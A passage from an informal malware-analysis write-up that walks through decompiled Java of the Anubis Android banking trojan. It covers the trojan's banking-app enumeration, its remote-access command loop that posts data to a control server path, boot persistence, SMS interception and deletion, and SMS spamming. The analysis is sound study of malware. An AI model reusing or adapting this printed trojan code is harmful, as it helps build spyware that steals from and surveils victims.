    public static final String[] f327n = "[az]yandırmaq::[sq]përfshijnë::[am]ማካተት::[en]include::[ar]وتشمل::[hy]միացնել::[af]sluit::[eu]besteak beste::[ba]индереү::[be]ўключыць::[bn]অন্তর্ভুক্ত::[my]င္သည္။::[bg]включи::[bs]uključuju::[cy]yn cynnwys::[hu]tartalmazza::[vi]bao gồm::[ht]gen ladan yo::[gl]inclúen::[nl]zijn::[mrj]чӱктен::[el]ενεργοποίηση::[ka]მოიცავს::[gu]સમાવેશ થાય છે::[da]omfatter::[he]כוללים::[yi]אַרייַננעמען::[id]termasuk::[ga]san áireamh::[is]fela::[es]incluir::[it]includere::[kk]қосу::[kn]ಸೇರಿವೆ::[ca]incloure::[ky]киргизүүгө::[zh]包括::[ko]함::[xh]quka::[km]រួមមាន::[lo]ປະກອບ::[la]etiam::[lv]iekļaut::[lt]įjungti::[lb]einschalten::[mk]вклучуваат::[mg]ahitana::[ms]termasuk::[ml]include::[mt]jinkludu::[mi]ngā::[mr]यांचा समावेश आहे::[mhr]включатлаш::[mn]оруулах::[de]einschalten::[ne]समावेश::[no]inkluderer::[pa]ਵਿੱਚ ਸ਼ਾਮਲ ਹਨ::[pap]inclui::[fa]عبارتند از:::[pl]włączyć::[pt]incluir::[ro]include::[ru]включить::[ceb]naglakip sa::[sr]укључите::[si]ඇතුළත්::[sk]patrí::[sl]vključujejo::[sw]ni pamoja na::[su]antarana::[tl]isama::[tg]даргиронидани::[th]รวม::[ta]அடங்கும்::[tt]кертергә::[te]ఉన్నాయి.::[tr]dahil::[udm]гожтыны::[uz]o'z ichiga oladi::[uk]включити::[ur]شامل ہیں::[fi]sisältää::[fr]activer::[hi]शामिल हैं::[hr]uključiti::[cs]zahrnout::[sv]inkluderar::[gd]gabhail a-steach::[eo]inkluzivas::[et]sisse::[jv]kalebu::[ja]など".split("::");

    /* renamed from: o */
    public static final String[] f328o = ":[az]indi başlamaq::[sq]filloni tani::[am]አዳዲስ::[en]start now::[ar]تبدأ الآن::[hy]հիմա սկսել::[af]nou begin::[eu]orain hasi::[ba]хәҙер башланы.::[be]пачаць цяпер::[bn]এখন শুরু::[my]ယခုစတင်::[bg]започнете сега,::[bs]sada početi::[cy]ddechrau yn awr::[hu]indítás most::[vi]bắt đầu ngay bây giờ::[ht]kòmanse kounye a::[gl]comezar agora::[nl]start nu::[mrj]кӹзӹт тӹнгӓлӹн.::[el]να αρχίσει τώρα::[ka]დაწყება ახლავე::[gu]હવે શરૂ કરો::[da]start nu::[he]להתחיל עכשיו::[yi]אָנהייב איצט::[id]mulai sekarang::[ga]tús a chur anois::[is]byrjar nú::[es]empezar ahora::[it]iniziare ora::[kk]қазір бастау керек::[kn]ಈಗ ಪ್ರಾರಂಭಿಸಿ::[ca]comença ara::[ky]азыр баштоо::[zh]从现在开始::[ko]지금 시작::[xh]qala ngoku::[km]ចាប់ផ្តើមឥឡូវនេះ::[lo]ເລີ່ມຕົ້ນການປັດຈຸບັນ::[la]tincidunt nunc::[lv]sākt tagad::[lt]pradėti dabar::[lb]elo lass::[mk]почнете сега::[mg]manomboka izao::[ms]mulai sekarang::[ml]start now::[mt]ibda issa::[mi]tīmata i teie nei::[mr]आता प्रारंभ करा::[mhr]кызыт тӱҥалын::[mn]одоо эхлэх::[de]starten Sie jetzt::[ne]अब सुरु::[no]start nå::[pa]ਹੁਣ ਸ਼ੁਰੂ::[pap]kuminsá awor::[fa]در حال حاضر شروع::[pl]zacząć teraz::[pt]começar agora::[ro]începe acum::[ru]начать сейчас::[ceb]sugdi karon::[sr]почети сада::[si]දැන් ආරම්භ::[sk]začnite teraz::[sl]začni zdaj::[sw]kuanza sasa::[su]ngamimitian ayeuna::[tl]simulan ngayon::[tg]оғоз ҳоло::[th]เริ่มตอนนี้::[ta]இப்போது தொடங்க::[tt]башларга хәзер::[te]start now::[tr]şimdi başlayın::[udm]али кутскемын::[uz]hozir boshlash::[uk]почати зараз::[ur]اب شروع::[fi]aloita nyt::[fr]commencer dès maintenant::[hi]अब शुरू करो::[hr]započnite sada::[cs]začněte hned::[sv]börja nu::[gd]tòisich air a-nis::[eo]komenci nun::[et]alusta kohe::[jv]miwiti saiki::[ja]始めないといけない:".split("::");

    /* renamed from: p */
    public static final String[] f329p = ":[az]başlamaq::[sq]për të filluar::[am]ጋር::[en]to start::[ar]لبدء::[hy]սկսել::[af]om te begin::[eu]hasteko::[ba]башлана::[be]пачаць::[bn]শুরু করার জন্য::[my]စတင်::[bg]започнете::[bs]da počnem::[cy]i ddechrau::[hu]kezdeni::[vi]để bắt đầu::[ht]pou yo kòmanse::[gl]para comezar::[nl]om te beginnen::[mrj]тӹнгӓльӹ::[el]ξεκινήσετε::[ka]უნდა დაიწყოს::[gu]શરૂ કરવા માટે::[da]til at starte::[he]כדי להתחיל::[yi]צו אָנהייבן::[id]untuk memulai::[ga]chun tús a chur::[is]til að byrja::[es]empezar::[it]iniziare::[kk]бастау::[kn]ಆರಂಭಿಸಲು::[ca]per començar::[ky]баштоо::[zh]开始::[ko]을 시작::[xh]ukuqala::[km]ដើម្បីចាប់ផ្តើម::[lo]ເພື່ອເລີ່ມຕົ້ນ::[la]ad satus::[lv]sākt::[lt]pradėti::[lb]starten::[mk]за да започнете::[mg]manomboka::[ms]untuk memulakan::[ml]ആരംഭിക്കുക::[mt]biex tibda::[mi]ki te tīmata::[mr]सुरू करण्यासाठी::[mhr]тӱҥалына::[mn]эхлэх::[de]starten::[ne]सुरु गर्न::[no]for å starte::[pa]ਸ਼ੁਰੂ ਕਰਨ ਲਈ::[pap]kuminsá::[fa]برای شروع::[pl]zacząć::[pt]começar::[ro]începe::[ru]начать::[ceb]sa pagsugod::[sr]почетак::[si]ආරම්භ කිරීමට::[sk]na začiatok::[sl]za začetek::[sw]kuanza::[su]pikeun ngamimitian::[tl]upang simulan ang::[tg]post оянда::[th]ต้องเริ่มต้น::[ta]தொடங்க::[tt]башлау::[te]ప్రారంభం::[tr]başlamak::[udm]кутскиз::[uz]boshlash uchun ::[uk]почати::[ur]شروع کرنے کے لئے::[fi]aloittaa::[fr]commencer::[hi]शुरू करने के लिए::[hr]početak::[cs]začít::[sv]för att börja::[gd]tòiseachadh::[eo]al komenco::[et]alustada::[jv]kanggo miwiti::[ja]を開始:".split("::");

    /* renamed from: q */
    public static final String[] f330q = ":[az]Sistem işləyir səhv ayırın ::[sq]Sistemi nuk funksionon në mënyrë korrekte, të çaktivizoni ::[am]አዳዲስ ግምገማዎች በትክክል አንድ ::[en]The system does not work correctly, disable ::[ar]النظام لا يعمل بشكل صحيح ، تعطيل ::[hy]Համակարգը աշխատում է, սխալ է, անջատեք ::[af]Die stelsel nie werk nie korrek nie, skakel ::[eu]Sistema ez da behar bezala lan, desgaitu ::[ba]Системалары дөрөҫ эшләргә,  һүндерелә::[be]Сістэма працуе няправільна, адключыце ::[bn]সিস্টেম কাজ করে না, সঠিকভাবে নিষ্ক্রিয় ::[my]အဆိုပါစနစ်ကအလုပ်မလုပ်ပါဘူး၊မှန်မှန်ကန်ကန်ပိတ် ၁၂၃၁၂၃::[bg]Системата работи правилно, изключете ::[bs]Sistem ne radi ispravno, onesposobiti ::[cy]Nid yw'r system yn gweithio yn gywir, analluogi ::[hu]A rendszer nem működik megfelelően, tiltsa le ::[vi]Hệ thống không hoạt động chính xác, vô hiệu hóa ::[ht]Sistèm nan pa travay kòrèkteman, enfim ::[gl]O sistema non funciona correctamente, desactivar ::[nl]Het systeem werkt niet goed, uitschakelen ::[mrj]Самынь системӹм ӹштӹмӓш, отключать ::[el]Το σύστημα δεν λειτουργεί σωστά, απενεργοποιήστε ::[ka]სისტემა არ მუშაობს სწორად, გამორთოთ ::[gu]આ સિસ્ટમ યોગ્ય રીતે કામ કરતી નથી, નિષ્ક્રિય ::[da]Systemet ikke fungerer korrekt, skal du deaktivere ::[he]המערכת לא עובדת כראוי, השבת ::[yi]די סיסטעם טוט ניט אַרבעט ריכטיק, דיסייבאַל ::[id]Sistem tidak bekerja dengan benar, menonaktifkan ::[ga]Ní dhéanann an córas ag obair i gceart, a dhíchumasú ::[is]Kerfið virkar ekki rétt, slökkva ::[es]El sistema no funciona correctamente, deshabilitar ::[it]Il sistema non funziona correttamente, disattivare ::[kk]Жүйесі дұрыс жұмыс істемейді, өшіріңіз ::[kn]ವ್ಯವಸ್ಥೆ ಸರಿಯಾಗಿ ಕೆಲಸ ಮಾಡುವುದಿಲ್ಲ, ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಲು ::[ca]El sistema no funciona correctament, inutilitzar en ::[ky]Тутум туура эмес, отключите ::[zh]该系统不能正常工作，禁止::[ko]이 체계가 제대로 작동하지 않으면 비활성화 ::[xh]Inkqubo kubancedisi ngokuchanekileyo, khubaza ::[km]ប្រព័ន្ធនេះមិនបានធ្វើការយ៉ាងត្រឹមបិទ ១២៣១២៣::[lo]ລະບົບບໍ່ໄດ້ເຮັດວຽກຢ່າງຖືກຕ້ອງ,ປິດການໃຊ້ ໑໒໓໑໒໓::[la]Ratio non opus est, ut recte, disable ::[lv]Sistēma nedarbojas pareizi, atslēgt ::[lt]Sistema neveikia tinkamai, išjunkite ::[lb]D ' system net ordnungsgemäß fonctionnéiert, deaktivieren Si ::[mk]Системот не работи правилно, исклучете ::[mg]Ny rafitra dia tsy miasa araka ny tokony ho izy, mankarary ::[ms]Sistem tidak bekerja dengan betul, melumpuhkan ::[ml]The system does not work correctly, അപ്രാപ്തമാക്കുക ::[mt]Is-sistema ma taħdimx kif suppost, iwaqqaf ::[mi]Ko te pūnaha e kore e mahi i te tika, mono i ::[mr]प्रणाली कार्य करत नाही योग्य अक्षम ::[mhr]Йоҥылыш система пашам ышта, пыштышым ::[mn]Систем ажиллахгүй зөв, идэвхгүй ::[de]Das system nicht ordnungsgemäß funktioniert, deaktivieren Sie ::[ne]The system does not work correctly, अक्षम ::[no]Systemet ikke fungerer på riktig måte, må du deaktivere ::[pa]ਸਿਸਟਮ ਨੂੰ ਕੰਮ ਨਹੀ ਕਰਦਾ ਹੈ, ਠੀਕ ਅਯੋਗ ::[pap]E sistema no ta funciona directamente, desabilidat ::[fa]این سیستم به درستی کار نمی کند با غیر فعال کردن ::[pl]System nie działa prawidłowo, wyłącz ::[pt]O sistema não funcionar corretamente, desative ::[ro]Sistemul nu funcționează corect, dezactiva ::[ru]Система работает неправильно, отключите ::[ceb]Ang sistema sa dili pagtrabaho sa husto nga paagi, nga naghimo og kakulangan sa ::[sr]Систем ради у реду, искључите ::[si]මෙම ක්රමය වැඩ කරන්නේ නැහැ, නිවැරදිව, අක්රීය ::[sk]Systém nefunguje správne, vypnite ::[sl]Sistem ne deluje pravilno, se onemogoči ::[sw]Mfumo haifanyi kazi kwa usahihi, afya ::[su]Sistim teu digawé bener, pareuman ::[tl]Ang sistema ay hindi gumagana nang tama, huwag paganahin ang ::[tg]Системаи кор нодуруст аст, отключите ::[th]ระบบจะไม่ทำงานอย่างถูกต้อปิดการใช้งาน ::[ta]கணினி சரியாக வேலை செய்யாது, முடக்க ::[tt]Система эшли дөрес түгел, отключите ::[te]The system does not work correctly, డిసేబుల్ ::[tr]Sistem düzgün çalışmıyor, devre dışı ::[udm]Неправильно системая ужа, disconnect ::[uz]Tizimi to'g'ri, o'chirish  ishlamaydi ::[uk]Система працює неправильно, вимкніть ::[ur]نظام کام نہیں کرتا ہے ، درست طریقے سے غیر فعال ::[fi]Järjestelmä ei toimi oikein, poista ::[fr]Le système ne fonctionne pas correctement, désactivez ::[hi]सिस्टम ठीक से काम नहीं करता है, निष्क्रिय ::[hr]Sustav radi ispravno, isključite ::[cs]Systém nemusí pracovat správně, zakažte ::[sv]Systemet inte fungerar korrekt, inaktivera ::[gd]Tha an siostam a ' dèanamh nach eil ag obair mar bu chòir, cuir seo à comas ::[eo]La sistemo ne funkcias korekte, malebligi ::[et]Süsteem ei tööta nõuetekohaselt, lülitage välja ::[jv]Sistem ora bisa bener, mateni ::[ja]システムの攻撃により正常に動作しなくなったり、無効に:".split("::");

    /* renamed from: r */
    public static final String[] f331r = ":[az]Продождить::[sq]Për protoedit::[am]ጋር protoedit::[en]Сontinue::[ar]إلى protoedit::[hy]Продождить::[af]Om te protoedit::[eu]Nahi protoedit::[ba]Продождить::[be]Продождить::[bn]করতে protoedit::[my]အ protoedit::[bg]Продождить::[bs]Da protoedit::[cy]I protoedit::[hu]Hogy protoedit::[vi]Để protoedit::[ht]Pou protoedit::[gl]Para protoedit::[nl]Om protoedit::[mrj]Продождить::[el]Продождить::[ka]უნდა protoedit::[gu]માટે protoedit::[da]At protoedit::[he]כדי protoedit::[yi]צו protoedit::[id]Untuk protoedit::[ga]A protoedit::[is]Að protoedit::[es]Продождить::[it]Продождить::[kk]Продождить::[kn]ಗೆ protoedit::[ca]Сontinue::[ky]Продождить::[zh]到protoedit::[ko]을 protoedit::[xh]Ukuba protoedit::[km]ដើម្បី protoedit::[lo]ການ protoedit::[la]Ad protoedit::[lv]Продождить::[lt]Продождить::[lb]Продождить::[mk]Да protoedit::[mg]Mba protoedit::[ms]Untuk protoedit::[ml]To protoedit::[mt]Biex protoedit::[mi]Ki te protoedit::[mr]To protoedit::[mhr]Продождить::[mn]To protoedit::[de]Продождить::[ne]गर्न protoedit::[no]For å protoedit::[pa]ਕਰਨ ਲਈ protoedit::[pap]Продождить::[fa]به protoedit::[pl]Продождить::[pt]Продождить::[ro]Продождить::[ru]Продождить::[ceb]Sa protoedit::[sr]Продождить::[si]කිරීමට protoedit::[sk]Na protoedit::[sl]Za protoedit::[sw]Kwa protoedit::[su]Pikeun protoedit::[tl]Sa protoedit::[tg]Продождить::[th]ต้อง protoedit::[ta]To protoedit::[tt]Продождить::[te]కు protoedit::[tr]Продождить::[udm]Продождить::[uz]Uchun protoedit::[uk]Продождить::[ur]کرنے کے لئے protoedit::[fi]Voit protoedit::[fr]Продождить::[hi]करने के लिए protoedit::[hr]Продождить::[cs]Продождить::[sv]Att protoedit::[gd]Gu protoedit::[eo]Al protoedit::[et]Продождить::[jv]Kanggo protoedit::[ja]にprotoedit:".split("::");

here, we can see some random bullshit strings, in various languages and each assigned to a string array.

little below that, another two string arrays are declared, both size equal to 62, and the first one is assigned with each letter of the english alphebet + some characters and the the other is assigned with the chinese alphebet (i dont know if there’s chinese alphebet).

public String[] permissions = {"android.permission.SEND_SMS", "android.permission.WRITE_EXTERNAL_STORAGE", "android.permission.READ_CONTACTS", "android.permission.ACCESS_FINE_LOCATION", "android.permission.CALL_PHONE", "android.permission.RECORD_AUDIO"};

then there is this string array (which, i renamed) specifying the permissions reqested by the apk.


    public String mo206a(Context context) {
        String str = "";
        for (ApplicationInfo applicationInfo : context.getPackageManager().getInstalledApplications(128)) {
            if (applicationInfo.packageName.equals("at.spardat.bcrmobile")) {
                str = str + "at.spardat.bcrmobile,";
            }
            if (applicationInfo.packageName.equals("at.spardat.netbanking")) {
                str = str + "at.spardat.netbanking,";
            }
            if (applicationInfo.packageName.equals("com.bankaustria.android.olb")) {
                str = str + "com.bankaustria.android.olb,";
            }
            
            [... shit tons of stuff more]

            if (applicationInfo.packageName.equals("com.kryptokit.jaxx")) {
                str = str + "com.kryptokit.jaxx(Crypt),";
            }
        }
        if (str.contains("com.paypal.android.p2pmobile,")) {
            str = str.replace("com.paypal.android.p2pmobile,", "") + "com.paypal.android.p2pmobile,";
        }
        if (str.contains("com.amazon.mShop.android.shopping,")) {
            str = str.replace("com.amazon.mShop.android.shopping,", "") + "com.amazon.mShop.android.shopping,";
        }
        if (!str.contains("com.ebay.mobile,")) {
            return str;
        }
        return str.replace("com.ebay.mobile,", "") + "com.ebay.mobile,";
    }

at the top, the method declares string str and initliaze it to an empty string. then it iterates through each installed application and compares the application�s name with a shit ton of string, which are basically names of banking apps. if the current application�s name is equal to one of those strings, string str is appended with the name followed by a comma.

when the iteration is finished, it checks if str contains following names.

- com.paypal.android.p2pmobile
- com.amazon.mShop.android.shopping
- com.ebay.mobile

if it does, it replaces the name with an empty string and append the name to the end of str.

Remote Access

We already know anubis has RAT capabilities. And those features are implemented in the below class.

/* renamed from: wocwvy.czyxoxmbauu.slsa.xelytgswelv */
public class RAT extends IntentService {

    /* renamed from: a */
    String str = "";

    /* renamed from: b */
    SomeHttpClass cls = new SomeHttpClass();

    /* renamed from: c */
    Constants consts = new Constants();

    /* renamed from: d */
    HttpConn conn = new HttpConn();

    /* renamed from: e */
    BankingApps banking_apps = new BankingApps();

    public RAT() {
        super("xelytgswelv");
    }

here it initializes some objects. Interesting part begins in the onHandleIntent Since this is an IntentService, onHandleIntent is the first method that will get executed. quoting android api reference

“This method is invoked on the worker thread with a request to process. Only one Intent is processed at a time, but the processing happens on a worker thread that runs independently from other application logic”


    public void onHandleIntent(Intent intent) {

        [... more code]

        this.str = this.cls.GetSSAID(this).replace(" ", "");

        [... more code]

str is assigned to SomeHttpClass.GetSSAID but with spaces are strippd off.

        while (true) {
            TimeUnit.MILLISECONDS.sleep(1000);
            String e = this.cls.GetSharedPreference(this, "websocket");

then a inside an infinite loop, it sleeps for 1000 miliseconds and assign string e with shared preference websocket.

            if (!e.equals("")) {
                HttpConn bVar3 = this.conn;
                StringBuilder sb = new StringBuilder();
                sb.append(e);
                this.consts.getClass();
                sb.append("/o1o/a2.php");
                String sb2 = sb.toString();
                StringBuilder sb3 = new StringBuilder();
                sb3.append("tuk_tuk=");
                sb3.append(this.cls.Encode(this.str + "|:| "));
                String d = this.cls.DecodeAndDecrypt(bVar3.PostRequest(sb2, sb3.toString()));
                this.cls.mo213a("RATresponce", "" + d);

if e is not an empty string, it then creates a string builder and append e to it and in the next line it appends "/o1o/a2.php" to it. Since we have previously encountered websocket, we know its the domain name/ip address of the server.

In the next few lines, it is pretty clear that method is creating POST request to a url using the string builder sb. it is then assigned to the string sb2 and another string builder named sb3 is created. I beleive this is what PostRequest implemented in HttpConn class writes to the output stream of the http connection.

then the returning response of the request is base64 decoded and decrypted and assigned to string d.

                if (d != "**") {
                    if (d.contains("opendir:")) {
                        String str6 = d.replace("opendir:", "").split("!!!!")[0];
                        if (str6.contains("getExternalStorageDirectory")) {
                            str6 = Environment.getExternalStorageDirectory().getAbsolutePath();
                        }

                        [... more code]

                    } else if (d.contains("downloadfile:")) {
                        String str7 = d.replace("downloadfile:", "").split("!!!!")[0];
                        this.cls.mo213a("file", str7);

                        [... more code]

                    } else if (d.contains("deletefilefolder:")) {
                        File file = new File(d.replace("deletefilefolder:", "").split("!!!!")[0]);
                        file.delete();

                        [... more code]

                    } else if (!d.contains("startscreenVNC")) {
                        
                        [... more code; look below]
                        

                    } 
                    // if d.contains("startscreenVNC") == true
                    else if (!this.cls.IsRunning(this, IntentServiceC0104x3750d9a6.class)) {
                        
                        [... more code]

                    }
                    bVar.mo213a(str2, str);
                }

first it makes sure d is not equal to "**", which might be a termination command. In the next few lines of the method, it checks whether if response string contains various commands such as,

- opendir
- downloadfile
- deletefilefolder
- startscreenVNC

These must be the remote access commands that malware uses.

However there are many other commands under mentioned inside the else if block that checks if d does not contain string "startscreenVNC".

                        if (d.contains("stopscreenVNC")) {
                            bVar2 = this.cls;
                            str3 = "vnc";
                        } else {
                            if (d.contains("startsound")) {
                                if (this.cls.mo229c(this, this.banking_apps.record_audio_permission[0])) {
                                    
                                    [... more code]

                                }
                            } else if (d.contains("startforegroundsound")) {
                                if (this.cls.mo229c(this, this.banking_apps.record_audio_permission[0])) {
                                    
                                    [... more code]
                                }
                            } else if (d.contains("stopsound")) {
                                bVar2 = this.cls;
                                str3 = "sound";

                            } else if (d.contains("**noconnection**")) {
                                this.cls.SetSharedPreference(this, "websocket", "");
                                this.cls.SetSharedPreference(this, "vnc", "stop");
                                this.cls.SetSharedPreference(this, "sound", "stop");
                                stopService(intent);
                            }
                            startService(intent2.putExtra(str4, str5));
                        }
                        bVar2.SetSharedPreference(this, str3, "stop");

As we saw earlier it checks if d does not contain the string "startscreenVNC". if true, it checks if d contains following strings, which are essentially, RAT commands

- stopscreenVNC
- startsound
- startforegroundsound
- stopsound
- **noconnection**

what each of these (as well as the previous ones) commands does is pretty much clear. Since we have already analyzed audio recording functions, it is clear that startsound and startforegroundsound are the commands that invoke those functions (by setting shared preference "sound" to start,start foreground) and stopsound is the one that stops recording (by setting "sound" to stop).

if the response string contains **noconnection** in it, if so, it sets following shared preferences

- websocket -> ""
- vnc -> "stop"
- sound -> "stop"

and stops the service. it also sets whatever shared preference at str3 to "stop", and str3 should be either "vnc" or "sound". It seems like after diconnecting with the attacker, it resets all the associated shared preferences.

Until now, we have analyzed core features of the anubus banking trojan. Now it is time to take a look at some other features mentioned in the shared preference xml and manifest xml.

Achieving Persistence and User Presence

When we were analyzing the manifest xml file, we came across a broadcast receiver that listens for BOOT_COMPLETE. Let’s take a look at that class.


/* renamed to EventListener */
public class EventListener extends BroadcastReceiver {

    /* renamed from: a */
    SomeHttpClass cls = new SomeHttpClass();

    [... more code]
}

it has only one member variable, that of SomeHttpClass.

    public void mo443a(Context context, Intent intent) {
        String action = intent.getAction();
        context.startService(new Intent(context, Service1.class));
        SomeHttpClass cls1 = this.cls;
        cls1.mo213a("Action", "BOOT Start " + action);

        [... more code]
    }

First method of this class accepts two arguments, one being of class Context and the other being of class Intent. In the next few lines, it retrieves the action that called this method using intent.getAction(), stores it in String action and starts a new service Service1, which we reversed ealier.

        try {
            SomeHttpClass bVar2 = this.cls;
            SomeHttpClass.StartAlarm(context, "startAlarm", (long) Integer.parseInt(this.cls.GetSharedPreference(context, "Interval")));
        } catch (Exception unused) {
            SomeHttpClass bVar3 = this.cls;
            SomeHttpClass.StartAlarm(context, "startAlarm", 15000);
        }

inside the try block, just like in the MainActivity, it tries to start an alarm. if it fails, it uses a default value of 15000 to start the alarm. Since we have already identified that the return value of GetSharedPreferences(context, "Interval") is 10000, this time we can think of some difference in the alarm time, compared to our previous encounter with the Interval key.

        if (action.equals("android.intent.action.USER_PRESENT")) {
            context.startService(new Intent(context, IntentServiceC0110x9cb6f428.class));
        }

        if (action.equals("android.provider.Telephony.SMS_RECEIVED") && this.cls.GetSharedPreference(context, "perehvat_sws").contains("true")) {
            mo444b(context, intent);
        }
    }

next few lines check whether if the action string is equal to "android.intent.action.USER_PRESENT", if so, it starts another service.

SMS Sending, Receiving and Spamming

EventListener.mo443a also checks whether the action is equal to "android.intent.action.SMS_RECEIVED" and value for shared preference key perehvat_sws is equal to to true. if so, it calls another method. Since it is clear that mo443a method is essentially listening for incoming messages, this could be the one that process and convert it into a content.

public void mo444b(Context context, Intent intent) {
        Bundle extras = intent.getExtras();

it takes two parameters, a Context and Intent. then it initializes a variable of class Bundle with intent.getExtras(). We saw earlier that mo443a calls this method by passing the same values that it receives as arguments. as everyones knows an intent is a way to switch between activities, getExtras is a way to retrieve values stored in a Bundle. so this is basically a way to pass stuff betweeen intents.

        if (extras != null) {
            try {
                Object[] objArr = (Object[]) extras.get("pdus");
                String str = "";
                String str2 = "";

in the next few lines, it checks whether the variable of type Bundle is not equals to null. A Bundle is a if the evaluation turns out to be true, it does some work inside the try block.

inside the block, it creates and initializes an Object array named objArr, and call extras.get("pdus") on it to retrieve values for key pdus. (A PDU (payload data unit) which contains information regarding a SMS)

it also declares two string empty strings.

                if (objArr != null) {
                    int length = objArr.length;
                    int i = 0;

then it checks whether if Object array it created earlier is not null, if true, it initializes a variable of int named length with objArr.length.

                    while (i < length) {
                        SmsMessage createFromPdu = SmsMessage.createFromPdu((byte[]) objArr[i]);
                        String displayOriginatingAddress = createFromPdu.getDisplayOriginatingAddress();
                        String displayMessageBody = createFromPdu.getDisplayMessageBody();
                        str2 = str2 + displayMessageBody;
                        context.startService(new Intent(context, whemsbk.class).putExtra("num", displayOriginatingAddress).putExtra("ms", displayMessageBody));
                        i++;
                        str = displayOriginatingAddress;
                    }

then it loops through the object array, and for each object in the array, it creates an object named createFromPdu that of class SmsMessage by calling SmsMessage.createFromPdu, variables displayOriginatingAddress, displayMessageBody is assigned to createFromPdu.getDisplayOriginatingAddress() and createFromPdu.getDisplayMessageBody() respectively. And, displayMessageBody is appended to str2. in the next line, it starts another service.

So in summery what this method does is, it retrieves every SMS that has been received using the intent passed to it by the method that calls it, interate through each and every one of them, parse the SMS to a SmsMessag object using createFromPdu method, and start a service passing the originating address and SMS content through the intent after parsing those information.

Let’s take a look at the new service.

public class whemsbk extends Service {

    [... more code]

    private void m487c(Context context, String str, String str2) {

            [... more code]

            Uri parse = Uri.parse("content://sms/inbox");
            Cursor query = context.getContentResolver().query(parse, new String[]{"_id", "thread_id", "address", "person", "date", "body"}, null, null, null);
            if (query != null && query.moveToFirst()) {
                do {
                    long j = query.getLong(0);
                    query.getLong(1);
                    String string = query.getString(2);
                    if (!str.equals(query.getString(5)) && string.equals(str2)) {
                        ContentResolver contentResolver = context.getContentResolver();
                        contentResolver.delete(Uri.parse("content://sms/" + j), null, null);
                    }
                } while (query.moveToNext());
            }

Basically, above method retrieves id, thread_id, address, person, date, and body. from content://sms/inbox using a ContentResolver. So with that, we can conclude that this method is parsing the contents of the SMS.

Using the android manifest file, we have identified few classes that are responsible for messing with sending SMS.

let’s start with wocwvy.czyxoxmbauu.slsa.lmily.

package wocwvy.czyxoxmbauu.slsa;

import android.app.Service;
import android.content.Intent;
import android.os.IBinder;

public class lmimy extends Service {
    public IBinder onBind(Intent intent) {
        return null;
    }
}

this looks sus. There’s nothing important here. Maybe the malware author is trying to distract us with false information.

But if we search for string SMS, we can find an IntentService (an IntentService is a service that handles asynchronous requests) that I think is in chaarge for SMS spamming.

/* renamed from wifu */
public class SMSSpam extends IntentService {

    /* renamed from: a */
    SomeHttpClass cls = new SomeHttpClass();

    /* renamed from: b */
    String str = "";

    /* renamed from: c */
    String name = "wifu";

    public SMSSpam() {
        super("wifu");
    }

    public void onHandleIntent(Intent intent) {
        while (true) {
            try {
                TimeUnit.MILLISECONDS.sleep(10000);
            } catch (InterruptedException e) {
                e.printStackTrace();
            }

it looks like the method tries to sleep for 10000 miliseconds inside an infinite loop. if it fails, it prints the stack trace.

            if (this.cls.GetSharedPreference(this, "spamSMS").equals("start")) {
                if (!this.cls.IsRunning(this, dshd.class)) {
                    if (this.str.length() > 3) {
                        this.str = "sendsms" + this.str;
                    }

then it checks the value for shared preference key spamSMS is equal to start.

and if the check turns out to be true, if shared preference spamSMS results in start, it checks whether if a service named dshd is running, if not and if length of str is geater than 3, it appends "sendsms" to str.

                    if (this.cls.GetSharedPreference(this, "indexSMSSPAM").contains("|||||")) {
                        this.cls.SetSharedPreference(this, "spamSMS", "");
                        SomeHttpClass bVar = this.cls;
                        StringBuilder sb = new StringBuilder();
                        sb.append("p=");
                        sb.append(this.cls.Encode(this.cls.GetSSAID(this) + "|Ended balance, SMS spam stopped!|"));
                        bVar.exfiltrate(this, "4", sb.toString());
                    }

in the next line it checks if GetSharedPreference("indexSMSSPAM") returns a stirng with |||||, if true, it sets shared preference value spamSMS to an empty string using SetSharedPreference.

then it creates a string builder and appends it with strings "p=", base64 encoded SSAID of the device and "|Ended balance, SMS spam stopped!|". Then it sends the string to /o1o/a6.php.

from that we can conclude if GetSharedPreference("indexSMSSPAM") results in |||||, it means the balance of SIM card has ended.

                    SomeHttpClass bVar2 = this.cls;
                    StringBuilder sb2 = new StringBuilder();
                    sb2.append("p=");
                    sb2.append(this.cls.Encode("getnumber" + this.str));
                    String d = this.cls.DecodeAndDecrypt(bVar2.exfiltrate(this, "15", sb2.toString()));
                    String str = "";
                    String e2 = this.cls.GetSharedPreference(this, "textSPAM");

according to the above snippet, a string builder is created and appended with "p=", then it is again appended with base64 encoded string of “getnumber” and str.

then it is passed to "/o1o/a15.php"

                    if (d.contains("/")) {
                        str = d.split("/")[0];
                        d = d.split("/")[1];
                        e2 = e2.replace("{nameholder}", str);
                    }
                    if (d.equals("close")) {
                        this.cls.SetSharedPreference(this, "spamSMS", "");
                        break;
                    }

next few lines looks crazy. first it checks whether return string of exfiltrate, ("/"), if so it does some splitting and replace some strings.

in the next if statement, if checks d is equal to string "close", if so, it sets shared preference spamSMS to an empty stirng.

                    this.cls.mo213a(this.name, "number: " + d + "  msg: " + e2);
                    startService(new Intent(this, dshd.class).putExtra("number", d).putExtra("msg", e2));
                    if (str.length() > 2) {
                        d = str + "/" + d;
                    }
                    this.str = d;

at the end of the method, it calls a method from SomeHttpClass, then starts the service dshd and passes two key value pairs ("num", d) and ("msg", e2) through the intent.

Since this is the end of the method, I suspect service dshd might contain the code that waits for the SMSs and start the spam.

public class dshd extends Service {

    /* renamed from: a */
    Context ctx;

    /* renamed from: b */
    SomeHttpClass cls = new SomeHttpClass();

    /* renamed from: c */
    BroadcastReceiver receiver = new BroadcastReceiver() {
        /* class wocwvy.p003x881dce2d.slsa.oyqwzkyy.p007x2753d1cd.dshd.C00951 */

        /* renamed from: onReceive */
        public void onReceive(Context context, Intent intent) {
            SomeHttpClass bVar;
            String str;
            String str2;
            if (getResultCode() != -1) {
                dshd.this.cls.mo213a("S", "Error SMS SENT");
                bVar = dshd.this.cls;
                str = "indexSMSSPAM";
                str2 = dshd.this.cls.GetSharedPreference(context, "indexSMSSPAM") + "|";
            } else {
                dshd.this.cls.mo213a("S", "SMS SENT");
                bVar = dshd.this.cls;
                str = "indexSMSSPAM";
                str2 = "";
            }
            bVar.SetSharedPreference(context, str, str2);
            dshd.this.unregisterReceiver(dshd.this.receiver);
            dshd.this.stopSelf();
        }
    };

as we have already guessed, it is. onReceive method is responsible for checking whether SMS has sent successfully or not.

    /* renamed from: onStartCommand */
    public int onStartCommand(Intent intent, int i, int i2) {
        this.ctx = this;
        this.cls.SpamSMS(this, intent.getStringExtra("number"), intent.getStringExtra("msg"));
